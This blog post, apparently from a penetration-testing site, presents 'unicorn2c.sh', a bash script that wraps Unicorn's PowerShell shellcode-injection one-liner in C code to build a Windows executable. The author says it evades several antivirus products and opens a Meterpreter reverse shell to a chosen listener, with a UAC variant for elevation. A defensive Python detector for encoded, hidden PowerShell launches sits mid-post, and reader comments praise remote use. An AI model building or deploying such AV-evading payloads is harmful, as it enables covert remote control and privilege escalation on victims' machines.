Unicorn 2 C source generator

There is an excellent Python script made available by David Kennedy called Unicorn: a simple Python script that performs a PowerShell downgrade attack and injects shellcode straight into memory. The project page is here:

https://github.com/trustedsec/unicorn

Direct download is here:

https://github.com/trustedsec/unicorn/raw/master/unicorn.py

Usage is pretty simple: download the Python script, save it to your Metasploit root directory and execute it; the resulting ASCII output can be fed directly to PowerShell on the target.

I have created a little generator that generates compilable C code out of this, so you can compile a nice Win32 PE executable which will get you by most modern AVs (tested against Kaspersky, MS Essentials, ESET ...). It will only work on Windows 7 and 8, 32/64-bit. I have tried it on XP with PowerShell installed but could not get it to run.

So here is the source for the Unicorn2c generator:

#!/bin/bash
# unicorn2c.sh - wrap the PowerShell one-liner produced by unicorn.py in a
# small C program that hands it to powershell.exe through ShellExecute().
clear
echo '--------------------------------------'
echo ' Unicorn Powershell2C code generator  '
echo 'Works for Vista, Win7, Win8 32/64 bit'
echo '--------------------------------------'

usage() {
    echo 'Usage: unicorn2c.sh payload reverse_ipaddr port platform'
    echo 'Example: unicorn2c.sh windows/meterpreter/reverse_tcp 192.168.1.5 443 nonuac'
    echo 'Valid platforms are: nonuac, uac'
    exit 0
}

[ $# -lt 4 ] && usage

# The two variants differ only in the verb passed to ShellExecute():
# NULL launches PowerShell normally, "runas" requests elevation through UAC.
case "$4" in
    nonuac) VERB='NULL';    echo 'Generating nonUAC unicorn.c ...' ;;
    uac)    VERB='"runas"'; echo 'Generating UAC unicorn.c ...' ;;
    *)      usage ;;
esac

# unicorn.py writes the one-liner to powershell_attack.txt in the current directory.
python unicorn.py "$1" "$2" "$3" || { echo '[!] unicorn.py failed'; exit 1; }

# powershell_attack.txt begins with "powershell " (11 characters); strip that
# prefix so only the arguments remain, since powershell.exe is passed to
# ShellExecute() separately. $(...) also drops the trailing newline so the
# C string literal stays on one line.
ARGS=$(sed -r 's/^.{11}//' powershell_attack.txt)

{
    echo '#include <stdio.h>'
    echo '#include <string.h>'
    echo '#include <stdlib.h>'
    echo '#include <ctype.h>'
    echo '#include <windows.h>'    # must come before aclapi.h and shlobj.h
    echo '#include <aclapi.h>'
    echo '#include <shlobj.h>'
    echo '#pragma comment(lib, "advapi32.lib")'
    echo '#pragma comment(lib, "shell32.lib")'
    echo 'int main(int argc, char *argv[])'
    echo '{'
    echo '    FreeConsole();'
    printf '    ShellExecute(NULL, %s, "powershell.exe", "%s", NULL, NULL);\n' "$VERB" "$ARGS"
    echo '    exit(0);'
    echo '}'
} > unicorn.c

todos unicorn.c    # convert to CRLF line endings (tofrodos package)
echo '[*] Exported unicorn.c. To compile use: cl.exe unicorn.c'

Save this as an executable shell script in your Metasploit root directory and make sure the original unicorn.py sits alongside it. Usage is simple: run the shell script with the required options. The fourth argument is the platform, either nonuac or uac. The only difference in the resulting C code is the verb passed to ShellExecute: "runas" (for UAC) versus NULL (for non-UAC).

If, for example, the UAC-compiled binary is executed from an elevated command prompt, ShellExecute loads PowerShell with the same privileges, enabling us to GETSYSTEM and migrate to any process. But if a non-privileged user runs the UAC binary, they get prompted for credentials; hence the option to generate the C code as non-UAC, from which we won't be able to GETSYSTEM or migrate to processes other than our own.
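From the defender's side, what the generated binary does is simple to describe: an arbitrary executable becomes the parent of powershell.exe and hands it a long, non-interactive argument string, and the UAC variant additionally requests elevation through the "runas" verb. The following is an added example, not code from the original post or from the Unicorn project, of how that process-creation pattern can be scored in endpoint telemetry. The event records are constructed sample data shaped after Sysmon-style process-creation fields (Image, ParentImage, CommandLine); the field names, the list of expected parents, the switch weights and the alert threshold are assumptions to be tuned locally.

```python
#!/usr/bin/env python3
"""Score PowerShell launches that look like a wrapper binary handing a hidden,
encoded one-liner to powershell.exe. Added example for this page; the sample
events and thresholds are constructed assumptions, not a vendor schema."""

import re

# Parents from which an interactive PowerShell launch is ordinary (assumption).
EXPECTED_PARENTS = {"explorer.exe", "cmd.exe", "powershell.exe", "windowsterminal.exe"}

# Canonical switch name -> shortest prefix accepted for it. powershell.exe
# itself accepts any unambiguous abbreviation (-w, -nop, -noni, -enc ...).
# Dict order matters: a lone "-e" must resolve to EncodedCommand, not ExecutionPolicy.
SWITCH_PREFIXES = {
    "encodedcommand": 1,   # -e, -ec, -enc, -encodedcommand
    "executionpolicy": 2,  # -ex, -exec, -executionpolicy
    "windowstyle": 1,      # -w, -wind, -windowstyle
    "noprofile": 3,        # -nop
    "noninteractive": 4,   # -noni
}
SWITCH_ALIASES = {"ep": "executionpolicy"}  # assumed extra abbreviation

WEIGHTS = {
    "encoded command": 2,
    "hidden window": 2,
    "non-interactive": 1,
    "no profile": 1,
    "execution policy bypass": 1,
    "unexpected parent": 1,
    "long base64 argument": 1,
    "very long command line": 1,
}
ALERT_THRESHOLD = 3
BASE64_BLOB = re.compile(r"^[A-Za-z0-9+/]{200,}={0,2}$")


def canonical_switch(token):
    """Map a token such as '-wind' to its full switch name, or None if not a switch."""
    if len(token) < 2 or token[0] not in "-/":
        return None
    name = token[1:].lower()
    if name in SWITCH_ALIASES:
        return SWITCH_ALIASES[name]
    for full, minimum in SWITCH_PREFIXES.items():
        if len(name) >= minimum and full.startswith(name):
            return full
    return None


def basename(path):
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def analyze(event):
    """Score one process-creation event; returns None for non-PowerShell images."""
    if basename(event["Image"]) != "powershell.exe":
        return None
    tokens = event["CommandLine"].split()
    reasons = []

    def add(reason):
        if reason not in reasons:
            reasons.append(reason)

    for i, tok in enumerate(tokens):
        switch = canonical_switch(tok)
        nxt = tokens[i + 1].lower() if i + 1 < len(tokens) else ""
        if switch == "encodedcommand":
            add("encoded command")
        elif switch == "windowstyle" and nxt in ("hidden", "1"):  # 1 == Hidden
            add("hidden window")
        elif switch == "noninteractive":
            add("non-interactive")
        elif switch == "noprofile":
            add("no profile")
        elif switch == "executionpolicy" and nxt in ("bypass", "unrestricted"):
            add("execution policy bypass")
        elif BASE64_BLOB.match(tok):
            add("long base64 argument")
    if basename(event["ParentImage"]) not in EXPECTED_PARENTS:
        add("unexpected parent")
    if len(event["CommandLine"]) > 1000:
        add("very long command line")
    score = sum(WEIGHTS[r] for r in reasons)
    return {"score": score, "alert": score >= ALERT_THRESHOLD, "reasons": reasons}


# Constructed sample telemetry (not real captures).
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE_EVENTS = [
    {"Image": PS, "ParentImage": r"C:\Windows\explorer.exe", "CommandLine": "powershell.exe"},
    {"Image": PS, "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "powershell.exe -NoProfile -Command Get-Date"},
    {"Image": PS, "ParentImage": r"C:\Windows\System32\taskeng.exe",
     "CommandLine": r"powershell.exe -ExecutionPolicy Bypass -File C:\scripts\backup.ps1"},
    {"Image": PS, "ParentImage": r"C:\Users\bob\Downloads\dropper.exe",
     "CommandLine": "powershell.exe -nop -wind hidden -noni -enc " + "QUFB" * 60},
]

if __name__ == "__main__":
    for event in SAMPLE_EVENTS:
        result = analyze(event)
        flag = "ALERT" if result["alert"] else "ok   "
        print(f"{flag} score={result['score']} parent={basename(event['ParentImage'])} "
              f"reasons={result['reasons']}")
```

Running the block prints one verdict per event: the plain explorer.exe launch and the `-NoProfile -Command Get-Date` call stay well under the threshold, the scheduled-task style launch scores 2, and the hidden, encoded launch from an unexpected parent scores 8. Matching on switch prefixes matters because powershell.exe accepts any unambiguous abbreviation, so a rule that only looks for the literal `-EncodedCommand` misses `-enc` and `-e`.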

Compilation is easy with Visual Studio C++ 2010 or 2012, Express or full. From the Visual Studio Tools command prompt, compile for 32-bit, like so:

cl.exe unicorn.c

Sometimes the binary takes a while to spawn a reverse shell on the listener, but this may be because my system is virtual and has low memory resources.


3 Responses to Unicorn 2 C source generator

  1. dany says:

    Really appreciate it!!!! Thanks bro!!

  2. c3as4r says:

    Thanks a lot for this!! It also works perfectly remotely with dynamic DNS instead of an IP address!
    Really really good stuff!

  3. Pingback: El Unicornio que evade antivirus | BlueScreenSEC
